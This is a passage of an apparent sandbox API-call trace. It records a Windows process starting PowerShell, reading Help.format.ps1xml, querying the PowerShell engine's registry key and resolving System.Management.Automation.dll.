pguid=0x14e9d8*(Data1=0xb47bcfe, Data2=0xc22, Data3=0x4940, Data4=([0]=0x98, [1]=0x2, [2]=0x71, [3]=0x4d, [4]=0x11, [5]=0xd9, [6]=0x33, [7]=0xfd))) returned 0x0 [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xfb1cf4ba, Data2=0xd251, Data3=0x4e54, Data4=([0]=0xa5, [1]=0x80, [2]=0x5, [3]=0x3c, [4]=0x6, [5]=0xe6, [6]=0x51, [7]=0xed))) returned 0x0 [0052.843] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xad43f71d, Data2=0xc7e, Data3=0x4064, Data4=([0]=0xbd, [1]=0x7d, [2]=0x7f, [3]=0xce, [4]=0xc7, [5]=0xe, [6]=0x97, [7]=0x60))) returned 0x0 [0052.844] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.844] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: 
lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.844] GetLastError () returned 0x0 [0052.844] SetErrorMode (uMode=0x1) returned 0x1 [0052.844] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.844] GetLastError () returned 0x0 [0052.844] GetFileType (hFile=0x2f8) returned 0x1 [0052.844] SetErrorMode (uMode=0x1) returned 0x1 [0052.844] GetFileType (hFile=0x2f8) returned 0x1 [0052.845] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.846] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.847] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.847] GetLastError () returned 0x0 [0052.847] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.848] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.848] GetLastError () returned 0x0 [0052.849] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.849] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, 
lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.850] GetLastError () returned 0x0 [0052.850] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.851] GetLastError () returned 0x0 [0052.851] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.851] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.853] ReadFile (in: hFile=0x2f8, 
lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.853] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.854] GetLastError () returned 0x0 [0052.854] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: 
lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.855] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.855] GetLastError () returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () 
returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () returned 0x0 [0052.859] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.859] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.860] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.860] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.861] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.861] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, 
lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.862] GetLastError () returned 0x0 [0052.862] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, 
lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.863] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.863] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: 
lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0xf37, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x25213b7, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x25213b7*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] ReadFile (in: hFile=0x2f8, lpBuffer=0x2521ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2521ce0*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] CloseHandle (hObject=0x2f8) returned 1 [0052.864] GetLastError () returned 0x0 [0052.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.864] GetLastError () returned 0x0 [0052.864] SetErrorMode (uMode=0x1) returned 0x1 [0052.864] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2542cdc | out: lpFileInformation=0x2542cdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0052.865] GetLastError () returned 0x0 [0052.865] SetErrorMode (uMode=0x1) returned 0x1 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.865] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.865] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.865] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0052.865] GetLastError () returned 0x0 [0052.873] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x752cfc2, Data2=0x8578, Data3=0x4d69, Data4=([0]=0xa5, [1]=0xb7, [2]=0x33, [3]=0x1c, [4]=0xab, [5]=0xe8, [6]=0x7d, [7]=0xfb))) returned 0x0 [0052.873] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe6ba308a, Data2=0x9145, Data3=0x4741, Data4=([0]=0xbd, [1]=0xf9, [2]=0x5b, [3]=0xd3, [4]=0xa5, [5]=0xc0, [6]=0x8, [7]=0x6c))) returned 0x0 [0052.873] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.873] GetLastError () returned 0x0 [0052.873] GetFullPathNameW (in: 